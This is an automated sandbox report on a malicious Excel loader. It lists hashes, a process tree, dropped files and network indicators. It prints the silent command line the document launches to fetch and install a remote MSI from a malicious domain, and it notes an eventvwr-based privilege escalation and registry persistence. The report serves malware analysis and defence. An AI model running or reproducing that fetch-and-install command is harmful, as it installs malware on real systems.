analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

58f3db592f45923897ba352b01cc01f2efecfd6408d36f784aa587c13f4babea

Full analysis: https://app.any.run/tasks/2d80619f-e43e-426f-8cde-1d8a8f1b71cb
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: March 22, 2019, 06:53:37
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
opendir
exe-to-msi
loader
Indicators:
MIME: application/vnd.openxmlformats-officedocument.spreadsheetml.sheet
File info: Microsoft Excel 2007+
MD5:

61ECFB80E39C601E495300CF454211BB

SHA1:

2D3869C14031B2356BD2E1D015CA66B75CBC1EF9

SHA256:

58F3DB592F45923897BA352B01CC01F2EFECFD6408D36F784AA587C13F4BABEA

SSDEEP:

384:+UkhQLWN/7Vk06JbqTVouZGeGFNgQITM/5Zy4:+RX7O4JZGBTIgxk4

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • EXCEL.EXE (PID: 1660)
    • Uses Microsoft Installer as loader

      • EXCEL.EXE (PID: 1660)
    • Downloads executable files from the Internet

      • msiexec.exe (PID: 1052)
    • Known privilege escalation attack

      • MSI9B9E.tmp (PID: 2876)
      • MSI9B9E.tmp (PID: 948)
    • Changes the autorun value in the registry

      • MSI9B9E.tmp (PID: 948)
      • systemcos.exe (PID: 3920)
    • Application was dropped or rewritten from another process

      • systemcos.exe (PID: 3920)
      • systemcos.exe (PID: 3056)
  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • msiexec.exe (PID: 1052)
      • MSI9B9E.tmp (PID: 948)
    • Drop ExeToMSI Application

      • msiexec.exe (PID: 1052)
    • Modifies the open verb of a shell class

      • MSI9B9E.tmp (PID: 2876)
      • MSI9B9E.tmp (PID: 948)
    • Executes scripts

      • MSI9B9E.tmp (PID: 948)
    • Starts CMD.EXE for commands execution

      • WScript.exe (PID: 3436)
    • Creates files in the user directory

      • MSI9B9E.tmp (PID: 948)
    • Application launched itself

      • systemcos.exe (PID: 3056)
    • Connects to unusual port

      • systemcos.exe (PID: 3920)
  • INFO

    • Reads Microsoft Office registry keys

      • EXCEL.EXE (PID: 1660)
    • Starts application with an unusual extension

      • msiexec.exe (PID: 1052)
      • MSI9B9E.tmp (PID: 1624)
      • MSI9B9E.tmp (PID: 1048)
      • eventvwr.exe (PID: 3280)
    • Application was dropped or rewritten from another process

      • MSI9B9E.tmp (PID: 1624)
      • MSI9B9E.tmp (PID: 2876)
      • MSI9B9E.tmp (PID: 1048)
      • MSI9B9E.tmp (PID: 948)
    • Application launched itself

      • MSI9B9E.tmp (PID: 1624)
      • MSI9B9E.tmp (PID: 1048)
    • Writes to a desktop.ini file (may be used to cloak folders)

      • msiexec.exe (PID: 1052)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xlsm | Excel Microsoft Office Open XML Format document (with Macro) (50.8)
.xlsx | Excel Microsoft Office Open XML Format document (30)
.zip | Open Packaging Conventions container (15.4)
.zip | ZIP compressed archive (3.5)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: 0x0006
ZipCompression: Deflated
ZipModifyDate: 1980:01:01 00:00:00
ZipCRC: 0x0e351b74
ZipCompressedSize: 388
ZipUncompressedSize: 1218
ZipFileName: [Content_Types].xml

XML

Application: Microsoft Excel
DocSecurity: None
ScaleCrop: No
HeadingPairs:
  • Worksheets
  • 1
TitlesOfParts: Sheet1
Company: -
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
AppVersion: 15.03
LastModifiedBy: yyyyyyyyyyyy
CreateDate: 2019:03:05 12:00:55Z
ModifyDate: 2019:03:05 12:06:52Z

XMP

Creator: yyyyyyyyyyyy
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
47
Monitored processes
13
Malicious processes
7
Suspicious processes
4

Behavior graph

Click at the process to see the details
start drop and start excel.exe no specs msiexec.exe no specs msiexec.exe msi9b9e.tmp no specs msi9b9e.tmp no specs eventvwr.exe no specs eventvwr.exe msi9b9e.tmp no specs msi9b9e.tmp wscript.exe no specs cmd.exe no specs systemcos.exe no specs systemcos.exe

Process information

PID
CMD
Path
Indicators
Parent process
1660"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /ddeC:\Program Files\Microsoft Office\Office14\EXCEL.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
0
Version:
14.0.6024.1000
1276"C:\Windows\System32\msiexec.exe" /i http://reinhausn.com/rr.msi /qnC:\Windows\System32\msiexec.exeEXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Exit code:
0
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
1052C:\Windows\system32\msiexec.exe /VC:\Windows\system32\msiexec.exe
services.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows® installer
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
1624"C:\Windows\Installer\MSI9B9E.tmp"C:\Windows\Installer\MSI9B9E.tmpmsiexec.exe
User:
admin
Company:
OVERSETTLING
Integrity Level:
MEDIUM
Description:
traveloguer
Exit code:
0
Version:
1.01.0007
2876C:\Windows\Installer\MSI9B9E.tmp"C:\Windows\Installer\MSI9B9E.tmpMSI9B9E.tmp
User:
admin
Company:
OVERSETTLING
Integrity Level:
MEDIUM
Description:
traveloguer
Exit code:
0
Version:
1.01.0007
2580"C:\Windows\System32\eventvwr.exe" C:\Windows\System32\eventvwr.exeMSI9B9E.tmp
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Event Viewer Snapin Launcher
Exit code:
3221226540
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3280"C:\Windows\System32\eventvwr.exe" C:\Windows\System32\eventvwr.exe
MSI9B9E.tmp
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Event Viewer Snapin Launcher
Exit code:
3221225547
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
1048"C:\Windows\Installer\MSI9B9E.tmp" C:\Windows\Installer\MSI9B9E.tmpeventvwr.exe
User:
admin
Company:
OVERSETTLING
Integrity Level:
HIGH
Description:
traveloguer
Exit code:
0
Version:
1.01.0007
948C:\Windows\Installer\MSI9B9E.tmp" C:\Windows\Installer\MSI9B9E.tmp
MSI9B9E.tmp
User:
admin
Company:
OVERSETTLING
Integrity Level:
HIGH
Description:
traveloguer
Exit code:
0
Version:
1.01.0007
3436"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\install.vbs" C:\Windows\System32\WScript.exeMSI9B9E.tmp
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
Total events
1 368
Read events
1 268
Write events
0
Delete events
0

Modification events

No data
Executable files
3
Suspicious files
3
Text files
9
Unknown types
3

Dropped files

PID
Process
Filename
Type
1660EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVR8A26.tmp.cvr
MD5:
SHA256:
1052msiexec.exeC:\Users\admin\AppData\Local\Temp\~DF438457E2A22AEFC2.TMP
MD5:
SHA256:
1660EXCEL.EXEC:\Users\admin\AppData\Local\Temp\~$58f3db592f45923897ba352b01cc01f2efecfd6408d36f784aa587c13f4babea.xlsm
MD5:
SHA256:
1660EXCEL.EXEC:\Users\admin\AppData\Local\Temp\~DF0A6BF836B8E0404E.TMP
MD5:
SHA256:
1052msiexec.exeC:\Config.Msi\f99c8.rbs
MD5:
SHA256:
1052msiexec.exeC:\Users\admin\AppData\Local\Temp\~DF0AD1C9A6A31BCA62.TMP
MD5:
SHA256:
1052msiexec.exeC:\Windows\Installer\MSI9496.tmpexecutable
MD5:03F04D3F533121C354E491A6043782F9
SHA256:977BA15934A9C2B0CE2B2CAF4ED54A41087A2B53BD13C6CA6AAF40E9BB4AB25F
1052msiexec.exeC:\Users\admin\AppData\Local\Temp\Temporary Internet Files\Content.IE5\index.datdat
MD5:32AE8E96394080E1465AF9EBA05893D6
SHA256:D46886C9A7E49B281E60F6956ED62CA6F65F417554793254DB28176E4BE1BA3C
948MSI9B9E.tmpC:\Users\admin\AppData\Roaming\syscos\systemcos.exeexecutable
MD5:A708F643D74FF738CD0415630A250C6A
SHA256:FF26B6C00F29196B0AA10EA509F1B1FD9CB97814D792FFBAC1869F2E2B6C9495
1052msiexec.exeC:\Windows\Installer\MSI9A25.tmpbinary
MD5:E056FB8943DF26B8B23FE9D2C6CAF6C7
SHA256:09FE183A6FDCCFCB0B0053AAC091B2EE07CB2C6ADB0EB4BE9738EF6C008D3029
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
4
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1052
msiexec.exe
GET
200
111.90.151.148:80
http://reinhausn.com/rr.msi
MY
executable
500 Kb
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3920
systemcos.exe
194.68.59.59:1744
Inleed AB
SE
unknown
1052
msiexec.exe
111.90.151.148:80
reinhausn.com
Shinjiru Technology Sdn Bhd
MY
suspicious

DNS requests

Domain
IP
Reputation
reinhausn.com
  • 111.90.151.148
suspicious

Threats

PID
Process
Class
Message
1052
msiexec.exe
Potential Corporate Privacy Violation
SUSPICIOUS [PTsecurity] Executable application_x-msi Download
1052
msiexec.exe
Potential Corporate Privacy Violation
POLICY [PTsecurity] Executable application_x-msi Download
1052
msiexec.exe
Misc activity
SUSPICIOUS [PTsecurity] Executable ExeToMSI Download
1 ETPRO signatures available at the full report
No debug info